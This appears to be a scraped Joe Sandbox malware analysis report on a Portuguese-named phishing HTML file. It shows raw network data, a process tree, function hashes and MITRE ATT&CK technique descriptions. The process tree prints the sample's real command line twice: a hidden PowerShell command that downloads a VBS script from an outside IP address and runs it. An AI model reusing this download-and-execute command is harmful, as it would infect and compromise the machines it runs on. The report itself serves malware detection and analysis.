2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 7c 24 f8 a0 ce fd 7a 40 64 78 d4 ba d0 e2 f2 bf a4 fc f8 e2 50 c0 60 d0 a5 93 cd 3c de 94 69 0f 58 bd 36 18 c4 18 88 b1 82 8a 48 29 e9 2a 82 cf 65 09 86 26 8b dc 0b 7d bc be 1c f4 58 aa f5 29 c8 ea 5a 78 49 52 be 34 5b fd 1e 8f 4e 87 e0 ce 85 57 93 e2 f3 cf 81 d3 11 8f a5 b2 a4 79 d3 68 e4 07 e8 4e 36 bd 4c 8d 0d 77 9b 0b de f5 6b e4 6f e1 7f cd 83 97 50 96 71 e7 35 a7 8f 91 df 93 06 62 9c c9 b1 75 aa 1e 01 c3 a0 d1 c7 1f 72 06 82 e0 58 00 02 d7 0a cd a4 eb a5 3e 5d c7 86 55 ab e9 22 f1 63 09 2d 9d 13 3e 49 38 57 5c d8 83 67 c1 75 c5 48 f3 65 71 9a a2 b0 a6 47 e8 32 13 f5 41 d5 cc 6d 22 a3 c4 bb 85 55 d2 db 8a a2 79 30 ce 1e a7 f3 90 19 ec 12 95 c4 54 46 a6 8f 96 54 04 f3 6d 0c 27 c7 22 b3 1e f0 47 da b5 bb ec 28 a7 bb 79 3e 7f 40 cc 97 48 c3 94 f8 d8 df Data Ascii: \|$z@dxP`<iX6H)*e&}X)ZxIR4[NWyhN6LwkoPq5burX>]U"c->I8W\guHeqG2Am"Uy0TFTm'"G(y>@H
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a9 9d 26 b6 7a 21 ff 73 7a 7d 44 18 6d a3 7f b8 a4 78 23 38 6f 6b cd 97 ef 3f 75 99 b5 f5 2a e7 7c f9 a2 de ed d8 f1 6e 7b d7 b0 43 9c ac ff 11 e2 94 7d 61 09 b5 51 4e 0f 1b 03 13 b4 e1 92 7e 9e 6b d5 a1 e0 c3 e3 f1 92 12 81 23 1d 9e 5b 8c 83 b9 a6 f2 ce fc 34 44 06 ee 97 6a 1a ad 7a 2a 89 47 bd 67 a2 d1 1b 21 b0 95 e8 29 23 38 98 10 56 c4 12 82 e9 48 03 14 04 7f bf 70 42 b6 d9 b6 04 1b 03 9c 67 15 67 02 d2 9d 6a ae 97 5b 7d 39 7e 4d a2 c1 ac 9f 7c 54 6e 51 8b bf 3d a5 80 c1 91 a9 64 bb 20 52 b5 85 97 b4 95 50 0a 41 6e 51 f1 ca cb 97 e4 bf 2a 74 93 cf a7 ba 48 88 0c 5f 19 af 70 7d 15 f1 9f 24 d6 9c 85 c7 06 de 82 3c 2b c3 8b fc 4e 4e e9 0e fa 79 68 26 98 fa e0 d5 Data Ascii: "0H0&z!sz}Dmx#8ok?u\|n{C}aQN~k#[4DjzGg!)#8VHpBggj[}9~M\|TnQ=d RPAnQtH_p}$<+NNyh&
2025-05-22 12:03:07 UTC	1460	IN	Data Raw: 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 55 70 64 61 74 65 20 53 69 67 6e 69 6e 67 20 43 41 20 32 2e 33 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ac 39 80 cb 34 50 ca 26 3f 5d 76 26 ca d3 8c c1 1d 5c eb 30 97 c6 66 86 26 a6 d5 5d 5f 4f cd 80 4c 0f 67 ec 25 0c bb 39 11 3b 6e 86 fd c7 21 27 60 fc 80 7c 01 89 ad e8 6e cd bd d0 47 5f 58 6d 00 3b 46 57 99 7d 16 b3 76 12 8b ca 9d 86 6c 1d 70 9a 69 d4 45 fe ce 72 ea ca ca 94 60 9d 7c 73 Data Ascii: 10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Update Signing CA 2.30"0*H094P&?]v&\0f&]_OLg%9;n!'`\|nG_Xm;FW}vlpiEr`\|s

Target ID:	1
Start time:	08:02:11
Start date:	22/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	08:02:15
Start date:	22/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2216,i,15274266427159168014,14662960723393588490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:3
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	08:02:21
Start date:	22/05/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:02:36
Start date:	22/05/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /K powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Imagebase:	0x2a0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	08:02:36
Start date:	22/05/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68dae0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	08:02:37
Start date:	22/05/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualiza o de ficheiro DOCx';"
Imagebase:	0x1e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:02:45
Start date:	22/05/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\2539.vbs"
Imagebase:	0x610000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 05218688 Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8cb1adec0d5836f2cd34a6ea3b9d4b857bcd17f795ddf504fd727723edca6a
Instruction ID: d57d8a7bd7af2c8a6227cb4dca3283182bb9a9e005f53ea9f092dc8a6d4e64db
Opcode Fuzzy Hash: fa8cb1adec0d5836f2cd34a6ea3b9d4b857bcd17f795ddf504fd727723edca6a
Instruction Fuzzy Hash: 03524B34B10218CFDB14DB64D894BAEB7B3BF85300F118199D94AAB3A1DB74AD81CF55

Function 05217D24 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c6c1f6f10c48119e3d51ee4378e0ec82584f2f1d28f5ac7d1443022ac15d5f
Instruction ID: 0766d97e3bd2b440551cd7dd225dfe4de01677360101e49be2030dc5fc6323ae
Opcode Fuzzy Hash: f0c6c1f6f10c48119e3d51ee4378e0ec82584f2f1d28f5ac7d1443022ac15d5f
Instruction Fuzzy Hash: 97128334A15249DFCB05CF68D484AAEBBF2FF59310F298095E844AB362C774DD46CB54

Function 05218528 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 375a2bb7c4112f91de502eb0d0aac5b73085e378339ad0dbb68fba932373ac3b
Instruction ID: 1c24693d5aef5bf3539d29172c27f8769169bd7b7208a0a720ec3bdf010396f5
Opcode Fuzzy Hash: 375a2bb7c4112f91de502eb0d0aac5b73085e378339ad0dbb68fba932373ac3b
Instruction Fuzzy Hash: B2515B34B00218CFDB14CB68D854BAEBBB2FF89310F1141A9D949AB3A1DB71AD41CF95

Function 05212AA0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b1ac386bca8bf0b1a777356a59346fefdc4b6cacbb12a8c5357c0e586f56cb
Instruction ID: d7c2f55f3998795236abed93e7e4d6541b33a62c5c7950fc860e6742522c48e4
Opcode Fuzzy Hash: 02b1ac386bca8bf0b1a777356a59346fefdc4b6cacbb12a8c5357c0e586f56cb
Instruction Fuzzy Hash: A891AE74A00209DFCB05CF59C494AAAFBF2FF49310B25855AE915AB361C735FD41CBA4

Function 05217E98 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3196097978fa38898c8954bdfb27f9718dcbd2e0f9527f9fd48c33999cb150
Instruction ID: 27eb11361e6b883c7dd3b18d24581ba6acdfef63b1af99bf9cd715785d0482e5
Opcode Fuzzy Hash: 7d3196097978fa38898c8954bdfb27f9718dcbd2e0f9527f9fd48c33999cb150
Instruction Fuzzy Hash: A911F3B4A0020A9FCB04CF9DD4809AEBBF5FF89310B1581A9E909EB351C731ED41CBA5

Function 04E1D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527430197.0000000004E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79f94a6942f186d815b52ea6028fddcb7678e146892a32e432520244b96c0d36
Instruction ID: 583cac2e49de74f6a3bf8451d06e179d60c2556e216a0d533bed7219978d182f
Opcode Fuzzy Hash: 79f94a6942f186d815b52ea6028fddcb7678e146892a32e432520244b96c0d36
Instruction Fuzzy Hash: 5A01527140E3C05FD7128B259C94B52BFB4DF53224F19C1DBD9888F2A3D2696849C772

Function 04E1D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527430197.0000000004E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5beda48e360c3f34617da3078af77a3a67a3228ac684050d0073aaa879144587
Instruction ID: 6a899073e6857a839f669b5b0bab77323b4ba5cc67ec0ddd72e91578219d3da7
Opcode Fuzzy Hash: 5beda48e360c3f34617da3078af77a3a67a3228ac684050d0073aaa879144587
Instruction Fuzzy Hash: 3F01F232545340AAE7208E29EC84F67BF99DF42724F08C01AED885A292D278B841CBB1

Function 0521912F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adaeab56ea65c2de5fa777a0649e792b38f42a42e8a3352f0c1e992d098b994a
Instruction ID: 0ba0d00cc4799e180b5a23ebf5787d245d57e316ad099a97fcf4ce9648d8c0da
Opcode Fuzzy Hash: adaeab56ea65c2de5fa777a0649e792b38f42a42e8a3352f0c1e992d098b994a
Instruction Fuzzy Hash: 10E0B6B4D1420E9F8F48DFB994421BEFBF5AB08200F10856F9819E3340E67456418FE5

Function 05219130 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a77e6b51ffacadcec39850ffcb093bdba504d984ff383e1e071e78f2f02c709f
Instruction ID: e98514be20e6c89fe68177578a62ffe4ed23f85bda872199806686714dcfd902
Opcode Fuzzy Hash: a77e6b51ffacadcec39850ffcb093bdba504d984ff383e1e071e78f2f02c709f
Instruction Fuzzy Hash: 8EE0B6B4D1420E9F8F48DFB994421BEFBF5AB08200F10856F9819E3340E67456418F95

Function 052190FF Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1527590069.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_5210000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0922f612da5ca167ab894a94c7fce4911c3c703394869e7997ae10778972e57
Instruction ID: 3a916c708982e448381dd19f0fcbc46b97e414c20e9d77961558b5ed28a4b9e2
Opcode Fuzzy Hash: b0922f612da5ca167ab894a94c7fce4911c3c703394869e7997ae10778972e57
Instruction Fuzzy Hash: BDC08C3005DA05AAC71453B0702F3A17BA8BB10210F400062E50A40A829A9524C08AEA

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

AI Reasoning

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\2539.vbs

C:\Users\user\AppData\Local\Temp\5767.vbs

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0b2rk1rc.rjg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxe5w40a.ajj.ps1

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Static File Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html